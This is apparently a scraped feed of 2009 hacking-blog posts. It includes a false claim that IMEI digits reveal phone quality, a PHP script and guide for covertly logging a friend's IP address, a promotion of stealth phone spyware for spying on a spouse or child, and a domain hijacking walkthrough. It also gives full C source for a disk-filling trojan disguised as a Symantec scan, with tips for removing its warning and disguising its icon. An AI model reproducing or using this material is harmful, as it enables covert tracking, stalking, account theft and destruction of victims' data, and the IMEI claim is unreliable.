rgb(255, 0, 0);"> ? 
?</span> x x x x x x x</span></span></strong><br /><strong></strong><br />IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">02</span></span></strong> or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">20</span></span></strong> this means your cell phone was assembled in Emirates which is very Bad quality</p> <p>IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%;"><span style="font-size: large;"><span style="color: rgb(255, 0, 0);">08</span> </span></span></strong>or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">80</span></span></strong> this means your cell phone was manufactured in Germany which is fair quality</p> <p>IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">01</span></span></strong> or <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">10</span></span></strong> this means your cell phone was manufactured in Finland which is very Good</p> <p>IF the Seventh & Eighth digits of your cell phone are <span style="color: rgb(255, 0, 0);"><strong><span style="font-size: 130%;"><span style="font-size: large;">00</span></span></strong> </span>this means your cell phone was manufactured in original factory which is the best Mobile Quality</p> IF the Seventh & Eighth digits of your cell phone are <strong><span style="font-size: 130%; color: rgb(255, 0, 0);"><span style="font-size: large;">13</span></span></strong> this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your healthPraba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-66314450951337103502009-07-24T06:40:00.001-07:002009-07-24T06:40:46.793-07:00IP Finder<?php<br />$ip = $_SERVER['REMOTE_ADDR'];<br />$dt = date("l dS \of F Y h:i:s A");<br />$file=fopen("ip_log.txt","a");<br />$data = $ip.' '.$dt."\n";<br />fwrite($file, $data);<br />fclose($file);<br />header( 'Location: http://www.google.com' ) ;<br />?>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-7596761108667616222009-07-24T06:39:00.001-07:002009-07-24T06:39:31.684-07:00How to Find the IP Address of a Remote Computer
<p><img class="alignleft" title="Find IP Address" src="http://www.gohacking.com/wp-content/uploads/2008/12/ip.jpg" alt="Find IP Address" />Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.</p> <p> </p> <p>I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.</p> <p>1. <a rel="nofollow" href="http://www.gohacking.com/downloads/scripts/IP_Finder.zip">Download</a> the <a rel="nofollow" href="http://www.gohacking.com/downloads/scripts/IP_Finder.zip">IP Finder script</a> (IP_Finder.ZIP) that I have created.</p> <p>2. Open a new account in <a rel="nofollow" href="http://x10hosting.com/" target="_blank">X10Hosting</a> (or any free host that supports PHP).</p> <p>3. Extract the IP_Finder.ZIP file and upload the two files <strong>ip.php</strong> and <strong>ip_log.txt</strong> into the root folder of your hosting account using the File Manager.</p> <p>4. You can rename the <strong>ip.php</strong> to any name of your choice.</p> <p>5. Set the permission to <strong>777</strong> on <strong>ip_log.txt</strong>.</p> <p>Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of <strong>ip.php</strong> to your friend or the person with whom you’re chatting. 
Once the person clicks on the link, his/her IP address is recorded in the file <strong>ip_log.txt</strong>.</p> <p>For your better understanding let’s take up the following example.</p> <p>Suppose you open a new account in X10hosting.com with the subdomain as <strong>abc</strong>, then your IP Finder link would be</p> <p><a rel="nofollow" href="http://abc.x10hosting.com/ip.php" target="_blank">http://abc.x10hosting.com/ip.php</a></p> <p>You have to send the above link to your friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the <strong>ip_log.txt</strong> file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.</p> <p>To find the recorded IP address check the logs using the following link.</p> <p><a rel="nofollow" href="http://abc.x10hosting.com/ip_log.php" target="_blank">http://abc.x10hosting.com/ip_log.php</a></p> <p>The sample log will be in the following format</p> <p>79.92.144.237 Thursday 07th of May 2009 05:31:27 PM<br />59.45.144.237 Thursday 07th of May 2009 05:31:28 PM<br />123.92.144.237 Thursday 07th of May 2009 05:31:31 PM</p> <p>NOTE: You have to replace <strong>abc</strong> with your subdomain name. </p> <p>I hope this helps. Express your opinion and suggestions through comments.</p>Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-17127752162861505462009-07-24T06:38:00.001-07:002009-07-24T06:38:54.996-07:00Cell Phone Spy – How to Spy on Cell Phones<h2 style="text-align: center;">Cell Phone Spy – How to Spy on a Cell Phone</h2> <p style="text-align: center;"> </p> <p><img class="alignleft size-full wp-image-1520" title="Cell Phone Spy" src="http://www.gohacking.com/wp-content/uploads/2009/06/Mobile-Spy.jpg" alt="Cell Phone Spy" width="125" height="153" />Are you curious to know <strong>how to spy on a cell phone?</strong> Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.</p> <p>Every day I get a lot of emails from people asking how to spy on a cell phone. Before you can spy on a cell phone you need to know the following facts.</p> <p>1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the <strong>cell phone spy</strong> software.</p> <p>2. It is not possible to install the cell phone spy software on an ordinary cell phone. Cell phone <a href="http://en.wikipedia.org/wiki/Spyware" target="_blank">spy softwares</a> are compatible only with the following type of phones (operating systems).</p> <p>Symbian OS</p> <p>Apple iPhone</p> <p>Windows Mobile</p> <p>For a complete list of compatible cell phones visit the <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> site.</p> <p>Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exist many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. 
To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software is the best one.</p> <h3><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> - The No.1 Cell Phone Spy Software</h3> <p><em>Mobile Spy is a perfect tool for parents to monitor their children’s activity on their cell phone!</em></p> <p><strong>Mobile Spy Features</strong></p> <p><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone (iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.</p> <p><strong>Logging Features</strong></p> <p>1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.</p> <p>2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.</p> <p>3. The phone’s current location is frequently logged using GPS when signal is available.</p> <p>4. Each address entered into Internet Explorer (or any browser) is logged.</p> <p>5. This cell phone spy software works in total stealth mode. 
The person using the phone can never come to know about the presence of this software.</p> <p><strong>How it works</strong></p> <p>The working of <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is very simple and needs no extra knowledge to install and use.</p> <p>Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for your online control panel.</p> <p>Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phones. After installation the software starts recording all the activities on the cell phone.</p> <p>Step 3- Login to your online control panel to see the logs containing the recorded information.</p> <p>This is just a small list of its features. For a list of compatible phones, step-by-step installation guide and more details visit the following link</p> <h3><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a></h3> <p> </p> <p><strong>Why Mobile Spy?</strong></p> <p><a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab <a rel="nofollow" href="http://www.gohacking.com/recom_products/mobile-spy.php" target="_blank">Mobile Spy</a> and expose the truth.</p>Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-29788555458793876372009-07-24T06:37:00.000-07:002009-07-24T06:38:28.242-07:00Domain Hijacking – How to Hijack a Domain <p><img class="alignleft size-full wp-image-1585" title="Domain hijacking" src="http://www.gohacking.com/wp-content/uploads/2009/07/domain_hijacking.jpg" alt="Domain hijacking" width="354" height="237" />In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as <strong>Domain Hijacking</strong>. 
For most of you, the term “domain hijacking” may sound unfamiliar. So let me first tell you what domain hijacking is all about.</p> <p><a href="http://en.wikipedia.org/wiki/Domain_hijacking" target="_blank">Domain hijacking</a> is a process by which <a href="http://en.wikipedia.org/wiki/Domain_name" target="_blank">Internet Domain Names</a> are stolen from their legitimate owners. Domain hijacking is also known as domain theft. Before we look at how domain names are hijacked, it is necessary to understand how domain names operate and how they get associated with a particular web server (website).</p> <p><strong>The operation of a domain name is as follows</strong></p> <p>Any website, say gohacking.com for example, consists of two parts: the <strong>domain name</strong> (gohacking.com) and the <strong>web hosting server</strong> where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of the domain name with the web hosting server is done as follows.</p> <p>1. After registering a new domain name, we get a control panel wherein we have full control of the domain. </p> <p>2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.</p> <p>For a clear understanding let me take up a small example.</p> <p>John registers a new domain “abc.com” from an <strong>X</strong> domain registration company. He also purchases a hosting plan from <strong>Y</strong> hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. 
This is how a website actually works.</p> <p><strong>What happens when a domain is hijacked</strong></p> <p>Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to a web server other than the original one. So to hijack a domain you need not gain access to the target web server.</p> <p>For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).</p> <p>In this case John’s domain name (abc.com) is said to be hijacked.</p> <p><strong>How the domain names are hijacked</strong></p> <p>To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients</p> <p>1. The <strong>domain registrar name</strong> for the target domain.</p> <p>2. The <strong>administrative email address</strong> associated with the target domain. </p> <p>This information can be obtained by accessing the <a href="http://en.wikipedia.org/wiki/WHOIS" target="_blank">WHOIS</a> data of the target domain. To access the WHOIS data, go to <a href="http://whois.domaintools.com/" target="_blank">whois.domaintools.com</a>, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see <strong>Whois Record</strong>. Under this you’ll get the “Administrative contact email address”.</p> <p>To get the domain registrar name, look for something like this under the <strong>Whois Record</strong>. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. If you don’t find this, scroll up and you’ll see <strong>ICANN Registrar</strong> under the “Registry Data”. 
In this case, the ICANN registrar is the actual domain registrar.</p> <p>The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post <a href="http://www.gohacking.com/2008/01/hacking-e-mail-account.html" target="_blank">how to hack an email account</a>.</p> <p>Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on <em>forgot password</em> in the <em>login page</em>. There he will be asked to enter either the <em>domain name</em> or the <em>administrative email address</em> to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has access to this email account he can easily reset the password of the domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.</p> <p><strong>How to protect the domain name from being hijacked</strong></p> <p>The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you lose your domain. So refer to my previous post on how to <a href="http://www.gohacking.com/2008/10/how-to-protect-email-account-from-being.html">protect your email account from being hacked</a>. Another good way to protect your domain is to go for <a href="http://en.wikipedia.org/wiki/Domain_privacy" target="_blank">private domain registration</a>. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. 
So when a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone and administrative email address. So private registration provides extra security and protects your privacy. Private domain registration costs a bit extra but is really worth it for its advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-34181239184023452552009-07-24T06:36:00.000-07:002009-07-24T06:37:06.899-07:00Trojan Source Code/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/<br /><br />#include<stdio.h><br />#include<conio.h><br />#include<dos.h><br />#include<stdlib.h><br />FILE *a,*t,*b;<br />int r,status,vir_count;<br />double i;<br />char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;<br /><br />void eatspace(void);<br />void findroot(void);<br />void showstatus(void);<br />void draw(void);<br />void accept(void);<br /><br />void main()<br />{<br />draw();<br />accept();<br />textcolor(WHITE);<br />draw();<br />gotoxy(12,8);<br />cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");<br />sleep(3);<br />gotoxy(12,8);<br />delline();<br />cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");<br />getch();<br />gotoxy(12,8);<br />delline();<br />findroot();<br />}<br /><br />void accept()<br />{<br />textcolor(LIGHTRED);<br />gotoxy(1,8);<br />cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. 
HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");<br /><br />if((choice=getch())!=13)<br />exit(0);<br />}<br /><br />void draw()<br />{<br />clrscr();<br />textcolor(WHITE);<br />gotoxy(12,2);<br />cputs("********************************************************");<br />gotoxy(12,6);<br />cputs("********************************************************");<br />gotoxy(12,3);<br />cputs("*\n\b*\n\b*\n\b");<br />gotoxy(67,3);<br />cputs("*\n\b*\n\b*\n\b");<br />gotoxy(14,4);<br />cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");<br />}<br /><br />void findroot()<br />{<br />t=fopen("C:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />textcolor(WHITE);<br />a=fopen("C:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("D:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("D:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("E:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("E:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. 
TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />t=fopen("F:\\windows\\explorer.exe","rb");<br />if(t!=NULL)<br />{<br />fclose(t);<br />a=fopen("F:\\windows\\system32\\spceshot.dll","rb");<br />if(a!=NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");<br />getch();<br />exit(1);<br />}<br />b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");<br />if(b!=NULL)<br />{<br />showstatus();<br />eatspace();<br />}<br />}<br />if(t==NULL)<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,8);<br />cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");<br />getch();<br />exit(1);<br />}<br />exit(1);<br />}<br /><br />void eatspace()<br />{<br />textcolor(LIGHTRED);<br />gotoxy(12,16);<br />cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");<br />textcolor(WHITE);<br />gotoxy(12,18);<br />while(1)<br />{<br />for(r=1;r<4;r++)<br />{<br />for(i=1;i<900000;i++)<br />{<br />status=fputs(ch,b);<br />if(status==EOF)<br />{<br />textcolor(WHITE);<br />vir_count=random(120);<br />draw();<br />gotoxy(12,8);<br />cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);<br />gotoxy(12,10);<br />cprintf("PRESS ANY KEY TO CLOSE...");<br />getch();<br />break;<br />}<br />}<br />cputs(".");<br />if(status==EOF) break;<br />}<br />if(status==EOF) break;<br />}<br />exit(0);<br />}<br /><br />void showstatus()<br />{<br />gotoxy(12,8);<br />cputs("SCANNING THE SYSTEM FOR THREATS");<br />gotoxy(12,10);<br />cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");<br />gotoxy(12,13);<br />cputs("SCAN IN PROGRESS. PLEASE WAIT...");<br />}Praba.... 
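<p>For the domain hijacking post that precedes the source listing above, an added example (not part of the original posts): an owner-side check that compares the WHOIS record of your own domain with a known-good baseline, so a repointed domain, a changed registrar or administrative contact, or an exposed administrative mailbox is noticed. The WHOIS texts, the baseline values, the accepted field names and the function names are all constructed for this illustration.</p>

```python
"""Added example: audit a WHOIS record for your own domain against a baseline."""

# Field names differ between registries; these sets are assumptions that
# cover the constructed samples below and the wording quoted in the post.
REGISTRAR_KEYS = {"registrar", "registration service provided by"}
ADMIN_KEYS = {"admin email", "administrative contact email"}
NS_KEYS = {"name server", "nserver"}

# Known-good state recorded by the owner (constructed values).
BASELINE = {
    "registrar": "X Domain Registration Company",
    "name_servers": {"ns1.y-hosting.example", "ns2.y-hosting.example"},
    "whois_admin_email": "abc.com@privacy-proxy.example",  # what WHOIS should show
    "real_admin_email": "john@mailhost.example",           # must stay hidden
}

# Constructed WHOIS output, not real registry data.
CLEAN_WHOIS = """\
Domain Name: ABC.COM
Registrar: X Domain Registration Company
Name Server: NS1.Y-HOSTING.EXAMPLE
Name Server: NS2.Y-HOSTING.EXAMPLE
Admin Email: abc.com@privacy-proxy.example
"""
EXPOSED_WHOIS = CLEAN_WHOIS.replace(
    "abc.com@privacy-proxy.example", "john@mailhost.example")
REPOINTED_WHOIS = CLEAN_WHOIS.replace("Y-HOSTING", "Z-HOSTING").replace(
    "abc.com@privacy-proxy.example", "someone@elsewhere.example")


def parse_whois(text):
    """Extract registrar, admin email and name servers from 'Key: value' lines."""
    record = {"registrar": None, "admin_email": None, "name_servers": set()}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if not sep or not value:
            continue
        if key in REGISTRAR_KEYS and record["registrar"] is None:
            record["registrar"] = value
        elif key in ADMIN_KEYS and record["admin_email"] is None:
            record["admin_email"] = value.lower()
        elif key in NS_KEYS:
            record["name_servers"].add(value.lower().rstrip("."))
    return record


def audit(record, baseline):
    """Return (severity, message) findings; an empty list means no drift."""
    findings = []
    if record["registrar"] != baseline["registrar"]:
        findings.append(("CRITICAL", "registrar changed to %r" % record["registrar"]))
    added = sorted(record["name_servers"] - baseline["name_servers"])
    removed = sorted(baseline["name_servers"] - record["name_servers"])
    if added or removed:
        findings.append(
            ("CRITICAL", "name servers changed: added %s, removed %s" % (added, removed)))
    if record["admin_email"] == baseline["real_admin_email"]:
        findings.append(("WARN", "real administrative mailbox is visible in WHOIS"))
    elif record["admin_email"] != baseline["whois_admin_email"]:
        findings.append(
            ("CRITICAL", "administrative contact changed to %r" % record["admin_email"]))
    return findings


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_WHOIS), ("exposed", EXPOSED_WHOIS),
                        ("repointed", REPOINTED_WHOIS)):
        print(label, audit(parse_whois(text), BASELINE))
```
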
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-78103359724673585902009-07-24T06:35:00.001-07:002009-07-24T06:35:56.001-07:00How to Make a Trojan Horse<p style="text-align: center;"><img class="size-medium wp-image-1128 aligncenter" title="How to Make a Trojan" src="http://www.gohacking.com/wp-content/uploads/2009/04/trojan-300x246.jpg" alt="How to Make a Trojan" width="300" height="246" /></p> <p>Most of you may be curious to know <strong>how to make a Trojan </strong>or virus on your own. Here is an answer to your curiosity. In this post I’ll show you <strong>how to make a simple Trojan on your own </strong>using the C programming language. This Trojan, when executed, will eat up the hard disk space on the root drive (the drive on which Windows is installed, usually the C: drive) of the computer on which it is run. This Trojan also works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call it the Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…</p> <p>Before I move on to explain the features of this Trojan you need to know <a href="http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29" target="_blank">what exactly is a Trojan horse</a> and how it works. Contrary to what most of us think, a Trojan or a Trojan horse is not a virus. 
In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or cause damage to the computer.</p> <p><strong>Now let’s move to the working of our Trojan</strong></p> <p>The Trojan horse which I have made presents itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space is very high. As a result the disk gets filled up to 100% within minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the <strong>Windows\System32</strong> folder with the <strong>.dll </strong>extension. Since the junk file has the <strong>.dll</strong> extension it is often ignored by disk cleanup software. So for the victim, there is no way to recover the hard disk space short of reformatting the drive.</p> <p><strong>The algorithm of the Trojan is as follows</strong></p> <p>1. Search for the <strong>root drive</strong></p> <p>2. Navigate to <strong>Windows\System32</strong> on the root drive</p> <p>3. Create the file named “<strong>spceshot.dll</strong>”</p> <p>4. Start <strong>dumping the junk data </strong>onto the above file and keep increasing its size until the drive is full</p> <p>5. Once the drive is full, <strong>stop the process</strong>.</p> <p>You can <a rel="nofollow" href="http://www.gohacking.com/downloads/source_codes/Space_Eater.rar"><strong>download</strong></a> the Trojan source code <a rel="nofollow" href="http://www.gohacking.com/downloads/source_codes/Space_Eater.rar"><strong>HERE</strong></a>. 
Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.</p> <h3>How to compile, test and remove the damage?</h3> <p><strong>Compilation:</strong></p> <p>For a step-by-step compilation guide, refer to my post <a href="http://www.gohacking.com/2009/07/how-to-compile-c-programs.html" target="_blank">How to compile C Programs</a>.</p> <p><strong>Testing:</strong></p> <p>To test the Trojan, just run the <strong>SpaceEater.exe</strong> file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.</p> <p><em>NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.</em></p> <p><strong>How to remove the Damage and free up the space?</strong></p> <p>To remove the damage and free up the space, just type the following in the “<strong>run</strong>” dialog box.</p> <p><strong>%systemroot%\system32</strong></p> <p>Now search for the file “<strong>spceshot.dll</strong>”. Just delete it and you’re done. No need to re-format the hard disk.</p> <p><strong><em> NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: </em></strong><a href="http://www.gohacking.com/2008/10/how-to-change-icon-of-exe-file.html"><strong><em>How to Change the ICON of an EXE file ?</em></strong></a></p>Praba.... 
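<p>The cleanup step above relies on knowing the file name. As an added example (not part of the original post), the check below finds such a file without the name: a genuine DLL is a PE image that starts with an <code>MZ</code> header pointing at a <code>PE\0\0</code> signature, while the junk file described here is only repeated text under a <code>.dll</code> name. The function names, the size threshold and the files created in <code>demo()</code> are constructed for this illustration.</p>

```python
"""Added example: list .dll files that are not real PE images."""
import os
import struct
import tempfile

# The filler string comes from the source listing on this page.
JUNK_LINE = b"CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE"


def is_pe_image(path):
    """True if the file has a DOS 'MZ' header whose e_lfanew points at 'PE\\0\\0'."""
    with open(path, "rb") as fh:
        header = fh.read(64)
        if len(header) < 64 or header[:2] != b"MZ":
            return False
        (e_lfanew,) = struct.unpack_from("<I", header, 0x3C)
        fh.seek(e_lfanew)
        return fh.read(4) == b"PE\0\0"


def printable_ratio(path, sample_size=4096):
    """Share of printable ASCII bytes in the first sample_size bytes."""
    with open(path, "rb") as fh:
        sample = fh.read(sample_size)
    if not sample:
        return 0.0
    printable = sum(1 for b in sample if 32 <= b <= 126 or b in (9, 10, 13))
    return printable / len(sample)


def find_fake_dlls(directory, min_size=0):
    """Return (name, size, printable_ratio) for .dll files that are not PE images.

    min_size skips small files; results are sorted largest first because a
    disk-filling junk file is the biggest offender.
    """
    hits = []
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        if not entry.name.lower().endswith(".dll"):
            continue
        size = entry.stat(follow_symlinks=False).st_size
        if size >= min_size and not is_pe_image(entry.path):
            hits.append((entry.name, size, printable_ratio(entry.path)))
    return sorted(hits, key=lambda hit: hit[1], reverse=True)


def demo():
    """Run the check over constructed files in a temporary directory."""
    minimal_pe = b"MZ" + b"\0" * 58 + struct.pack("<I", 64) + b"PE\0\0" + b"\0" * 2048
    files = {
        "genuine.dll": minimal_pe,           # passes the PE check
        "spceshot.dll": JUNK_LINE * 200,     # text only, no PE header
        "tiny.dll": b"\x01\x02\x03",         # not PE, but below min_size
        "notes.txt": JUNK_LINE,              # wrong extension, ignored
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in files.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return find_fake_dlls(tmp, min_size=1024)


if __name__ == "__main__":
    for name, size, ratio in demo():
        print("%s  %d bytes  %.0f%% printable" % (name, size, ratio * 100))
```

<p>On a Windows host the directory to pass is the one this post names, for example <code>os.path.expandvars(r"%SystemRoot%\System32")</code>, with <code>min_size</code> raised to a value that suits the machine.</p>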
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-79885806775637866372009-07-24T06:34:00.001-07:002009-07-24T06:34:32.216-07:00How to Compile C Programs <p><img class="alignleft" title="Compiling C Programs" src="http://www.gohacking.com/wp-content/uploads/2009/07/CPP.jpg" alt="" width="280" height="169" />In many of my previous posts especially in the <a href="http://www.gohacking.com/category/virus-creation" target="_blank">VIRUS CREATION</a> section, I have used C as the programming language. 
If you’re new to C programming and find it difficult to compile C source code then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.</p> <h3>How to install Borland C++ compiler</h3> <p>1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.</p> <p><a rel="nofollow" href="http://www.codegear.com/downloads/free/cppbuilder" target="_blank">http://www.codegear.com/downloads/free/cppbuilder</a></p> <p>2. After you download, run <strong>freecommandlinetools.exe</strong>. The default installation path would be</p> <p>C:\Borland\BCC55</p> <h3>How to configure Borland C++ compiler</h3> <p>1. After you install Borland C++ compiler, create two new Text Documents</p> <p>2. Open the first <strong>New Text Document.txt</strong> file and add the following two lines into it</p> <p><em>-I"c:\Borland\Bcc55\include"</em></p> <p><em>-L"c:\Borland\Bcc55\lib"</em></p> <p>Save changes and close the file. Now rename the file from <strong>New Text Document.txt </strong>to <strong>bcc32.cfg.</strong></p> <p>3. Open the second <strong>New Text Document (2).txt</strong> file and add the following line into it</p> <p><span style="color: rgb(51, 51, 51);"><em><span style="color: rgb(0, 0, 0);">-L"c:\Borland\Bcc55\lib"</span></em></span></p> <p>Save changes and close the file. Now rename the file from <strong>New Text Document (2).txt </strong>to <strong>ilink32.cfg.</strong></p> <p>4. Now copy the two files <strong>bcc32.cfg</strong> and <strong>ilink32.cfg</strong>, navigate to <em><strong>C:\Borland\BCC55\Bin</strong></em> and paste them.</p> <h3>How to compile the C source code (.C 